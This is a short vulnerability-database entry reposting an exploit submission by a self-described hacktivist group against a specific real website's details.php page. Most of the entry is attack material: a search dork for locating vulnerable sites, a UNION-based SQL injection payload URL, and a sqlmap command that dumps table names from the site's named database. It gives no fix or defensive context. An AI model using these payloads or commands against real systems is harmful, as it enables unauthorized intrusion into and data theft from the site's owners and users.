Katoomba Group SQL Injection - CXSecurity.com

Vulnerability ID 1612365 Vulnerability type
Published 2019-05-17 Updated 2019-05-17
CVE ID N/A CNNVD-ID N/A
Platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019050179
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
# Exploit Title:intitle:"Welcome to the Katoomba Group"
# Date:17.05.2019
# Dork :intitle:"Welcome to the Katoomba Group" id=
# Exploit Author:Cerkuday &Ergenekon // CyberWarrior TİM AKINCILAR
# Tested on:Windows &Kali Linux

#Demo:

http://www.katoombagroup.org/details.php?id=56

# Poc:

http://www.katoombagroup.org/details.php?id=-5477' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627671,0x696d77476349656c787a536d73564e6c656562774b4c706e727666516657485769644b6a49527847,0x71706a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SCJo


sqlmap.py -u "http://www.katoombagroup.org/details.php?id=56"  --random-agent -D katoomba_LearningTools --tables